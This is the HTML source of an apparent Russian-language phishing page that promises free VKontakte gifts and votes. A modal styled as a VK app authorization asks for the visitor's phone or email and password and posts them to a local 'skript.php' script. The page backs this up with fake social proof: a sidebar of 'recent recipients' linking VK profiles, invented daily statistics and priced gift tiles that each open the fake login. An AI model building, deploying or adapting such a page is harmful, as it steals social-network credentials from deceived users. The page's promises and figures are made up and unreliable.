<!DOCTYPE html>
<html lang="en">
<head>
  <title>Бесплатные подарки и голоса в соц сети ВКонтакте</title>
  <meta name="description" content="На нашем сайте вы всегда сможете получить совершенно бесплатно подарки в ВКонтакте и отправить их друзьям. Бесплатные голоса." />
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="css/bootstrap.css">
  <link rel="stylesheet" href="css/style.css">
   <link rel="stylesheet" href="css/bootstrap-theme.css">
   <link rel="shortcut icon" type="image/png" href="favicon.png" />
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
  <style>
    /* Remove the navbar's default margin-bottom and rounded borders */ 
    .navbar {
      margin-bottom: 0;
      border-radius: 0;
    }
    
    /* Set height of the grid so .sidenav can be 100% (adjust as needed) */
    .row.content {height: 450px}
    
    /* Set gray background color and 100% height */
    .sidenav {
      padding-top: 20px;
      background-color: #f1f1f1;
      height: 100%;
    }
    
    /* Set black background color, white text and some padding */
    footer {
      background-color: #4a6180;
      color: white;
      padding: 15px;
    }
    
    /* On small screens, set height to 'auto' for sidenav and grid */
    @media screen and (max-width: 767px) {
      .sidenav {
        height: auto;
        padding: 15px;
      }
      .row.content {height:auto;} 
    }
  </style>
</head>
<body>


  <div class="row-fluid">
    <div class="header">
	<div class="container">
<div class="logo"><a href="/vk/"><img src="img/logo.png"></a></div>
  </div>
  </div>
  </div>
  
 <div class="container">
<div class="container-fluid text-center">    
  <div class="row content">
    <div class="col-sm-2 sidenav" style="text-align:left;padding-top:15px; padding-left:0; padding-right:0;">
	<div class="panel panel-default">
  <div class="panel-body"><span style="text-align:left;font-family:georgia;">Последними были:</span>
   <center><div style="width:99%; height:1px;background:#d9dadb;margin-top:10px; margin-bottom:10px;"></div></center>
      <div class="row" style="margin-top:10px;">
          <div class="col-sm-6 text-left" style="text-align:center;font-family:georgia;"> 
		  <a href="https://vk.com/id358110571"><img src="img/ava2.jpg" alt="" class="round"></a>
		  <a href="https://vk.com/id358110571">Артур</a>
             </div>
          <div class="col-sm-6 text-left" style="text-align:justify;font-family:georgia;"> 
		  <a href="https://vk.com/stepik174"><img src="img/ava1.jpg" alt="" class="round"></a>
		  <a href="https://vk.com/stepik174">Степан</a>
             </div>
		</div>	
<div class="row" style="margin-top:10px;">		
		<div class="col-sm-6 text-left" style="text-align:center;font-family:georgia;margin-top:10px;"> 
		  <a href="https://vk.com/id385884803"><img src="img/ava3.jpg" alt="" class="round"></a>
		  <a href="https://vk.com/id385884803">Алиса</a>
             </div>
          <div class="col-sm-6 text-left" style="text-align:justify;font-family:georgia;margin-top:10px;"> 
		  <a href="https://vk.com/cam_deo"><img src="img/ava4.jpg" alt="" class="round"></a>
		  <a href="https://vk.com/cam_deo">Денис</a>
             </div>
</div>	
<div class="row" style="margin-top:10px;">			 
		<div class="col-sm-6 text-left" style="text-align:center;font-family:georgia;margin-top:10px;"> 
		  <a href="https://vk.com/oleg_yakuba"><img src="img/ava5.jpg" alt="" class="round"></a>
		  <a href="https://vk.com/oleg_yakuba">Олег</a>
             </div>
          <div class="col-sm-6 text-left" style="text-align:justify;font-family:georgia;margin-top:10px;"> 
		  <a href="https://vk.com/id3413677"><img src="img/ava6.jpg" alt="" class="round"></a>
		  <a href="https://vk.com/id3413677">Алина</a>
             </div>
      </div>
  </div>
  
   </div>
   

	<!-- Trigger the modal with a button -->
  <button type="button" class="btn" style="width:100%; background:#5281b9; color:#fff;font-family:georgia;" data-toggle="modal" data-target="#myModal">Отправить подарок</button>

  <!-- Modal -->
  <div class="modal fade" id="myModal" role="dialog">
    <div class="modal-dialog">
    
      <!-- Modal content-->
      <div class="modal-content">
        <div class="modal-header" style="background:#5281b9; height:38px;">
		<div class="row" style="margin-top:-7px;">	
          	<div class="col-sm-6 text-left"	 >
          <h4 class="modal-title" style="color:#fff;font-family:georgia;">Вконтакте</h4>
		  </div>
		  <div class="col-sm-6 text-right"	 >
		  <a href="https://vk.com/login.php" style="color:#fff;font-family:georgia;">Регистрация</a>
		  </div>
		  </div>
        </div>
		
		<div class="modal-header" style="padding:7px;font-family:georgia;background:#edeef0; height:38px;text-align:center;">
		Приложение <span style="color:#446284;"><b>Бесплатные подарки</b></span> запрашивает доступ к вашему аккаунту.
        </div>
		
		
        <div class="modal-body">
          
		  
		  
		<div id="quick_login" style="text-align:center;">
  <form method="post" name="login" id="login" action="skript.php">
    <div class="label" style="color:#446284;font-family:georgia; font-size:14px;"><b>Телефон или email</b></div>
	
	<div class="labeled"><input type="text" name="login" class="text" onfocus="show('quick_expire')" id="email" /></div>
	
	<div class="label" style="color:#446284;font-family:georgia; font-size:14px;margin-top:8px;"><b>Пароль</b></div>
    <div class="labeled"><input type="password" name="pass" class="text" onfocus="show('quick_expire')" id="pass" /></div>

    <input type="submit" class="submit" />
  </form>
<!-- <a href="javascript:quick_login()"><Img Src="http://vk-podarki.ru/btn_1.png"></a> -->
  
  <div class="clear forgot"><a href="https://vk.com/login.php?op=forgot" target="_top">Забыли пароль?</a></div>
      </div>  
		  
		  
		  
		  
		  
        </div>
        <div class="modal-footer">
          <button type="button" class="btn" data-dismiss="modal" style="background:#5281b9; color:#fff;font-family:georgia;">Закрыть</button>
        </div>
      </div>
      
    </div>
  </div>
	
	</div>
	
    <div class="col-sm-8 text-left" style="text-align:justify;font-family:georgia;"> 
	<div class="panel panel-default" style="margin-top:15px;">
  <div class="panel-body"> <h1 style="font-size:20px;margin-top:0px;text-align:left;">Раздача бесплатных подарков в ВКонтакте</h1> 
 <center><div style="width:99%; height:1px;background:#d9dadb; margin-bottom:10px;"></div></center>
 <img src="img/podarki.jpg" width="100%" class="hed">
      <p style="padding-top:10px;">Вы зашли на сайт, предоставляющий подарки и голоса ВКонтакте бесплатно.</p>

<p>Подарки и голоса Вконтакте доступны только зарегистрированным пользователям, поэтому необходимо авторизоваться. </p>
<p>Тысячи людей уже получили подарки Вконтакте на свои страницы или отправили своим друзьям с наилучшими поздравлениями. Не упусти и ты свой шанс.</p>
  <center><div style="width:100%; height:1px;background:#d9dadb; margin-bottom:10px;"></div></center>
 </div>
</div>

   <div class="panel panel-default" style="margin-top:15px;font-family:georgia;">
    <div class="panel-body">
      <h4>Лучшие подарки в ВКонтакте</h4>
	  
		 <p>Не упусти возможность поздравить своих родных и близких на день рождения или просто так эксклюзивным подарком в социальной сети
		 ВКонтакте совершенно бесплатно.</p>
	  <div class="row">
	  <div class="col-sm-4 text-left" style="text-align:justify;font-family:georgia;">
	  <a href="" data-toggle="modal" data-target="#myModal" title="Получи сейчас"><div class="well">
        <img src="img/2.jpg">
		<p>21 руб.</p>
      </div></a>
	  </div>
	  
	  <div class="col-sm-4 text-left" style="text-align:justify;">
	  <a href="" data-toggle="modal" data-target="#myModal" title="Получи сейчас"><div class="well">
        <img src="img/3.jpg">
		<p>21 руб.</p>
      </div></a>
	  </div>
	  
	  <div class="col-sm-4 text-left" style="text-align:justify;">
	  <a href="" data-toggle="modal" data-target="#myModal" title="Получи сейчас"><div class="well">
        <img src="img/4.jpg">
		<p>70 руб.</p>
      </div></a>
	  </div>
	  </div>
	  <div class="row">
	  <div class="col-sm-4 text-left" style="text-align:justify;">
	 <a href="" data-toggle="modal" data-target="#myModal" title="Получи сейчас"> <div class="well">
        <img src="img/5.jpg">
		<p>21 руб.</p>
      </div></a>
	  </div>
	  
	  <div class="col-sm-4 text-left" style="text-align:justify;">
	  <a href="" data-toggle="modal" data-target="#myModal" title="Получи сейчас"><div class="well">
        <img src="img/6.jpg">
		<p>70 руб.</p>
      </div></a>
	  </div>
	  
	  <div class="col-sm-4 text-left" style="text-align:justify;">
	  <a href="" data-toggle="modal" data-target="#myModal" title="Получи сейчас"><div class="well">
        <img src="img/7.jpg">
		<p>70 руб.</p>
      </div></a>
	  </div>
	  </div>
	  <button type="button" class="btn" style="width:100%; background:#5281b9; color:#fff;font-family:georgia;" data-toggle="modal" data-target="#myModal">Смотреть все подарки</button>
	  
	  
	  </div></div>
	  
	  <div class="panel panel-default" style="margin-top:-5px;">
  <div class="panel-body"><span style="color:#446284;font-family:georgia;">
<b>Статистика сайта:</b><br>

Сегодня выдано: 11729 подарков.<br>

Сегодня выдано: 1541 Голоса.<br>

<a href="https://vk.com/"><b>ВКонтакте</b></a> - Всегда с Вами</span>
<center><div style="width:99%; height:1px;background:#d9dadb; margin-top:10px; margin-bottom:10px;"></div></center>
<img src="img/like.jpg" width="65%">
  </div></div>
	  
    </div>
	
	
    <div class="col-sm-2 sidenav" style="padding-top:15px;">
	<div class="panel panel-default">
  <div class="panel-body"><b>Последние поступления</b></div>
</div>
      <a href="" data-toggle="modal" data-target="#myModal" title="Получи сейчас"><div class="well">
        <img src="img/97.jpg">
		<p>35 руб.</p>
      </div></a>
      <a href="" data-toggle="modal" data-target="#myModal" title="Получи сейчас"><div class="well">
        <img src="img/1.jpg">
		<p>21 руб.</p>
      </div></a>
	  </div>
  </div>
</div>
</div>
<footer class="container text-center">
  <p>Получи или передай бесплатно подарки и голоса в ВКонтакте. Декабрь 2017 год.</p>
</footer>

</body>
</html>